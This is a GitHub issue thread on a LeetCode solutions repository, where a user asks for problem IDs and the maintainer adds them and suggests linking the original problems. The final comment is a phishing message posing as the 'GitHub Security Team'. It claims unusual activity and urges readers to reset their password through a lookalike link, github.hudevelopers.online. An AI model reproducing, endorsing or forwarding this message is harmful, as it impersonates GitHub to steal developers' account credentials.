### ISSUE TITLE
With item ID of LeetCode

### ISSUE THREAD

**Issue by HEYRIX** [SMartQi/LeetCode#1]
Need ID for each solution item, question description.

**Comment by Simeng07** [comment]
I'll add an ID to the title of each solution in the near future. As for the question description, there are a whole bunch of problems described with images. A simple .cpp file can't easily hold them. So, how about just a link to the original problem?

**Comment by Simeng07** [comment]
ID added by https://github.com/SMartQi/LeetCodeFetcher/pull/3.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
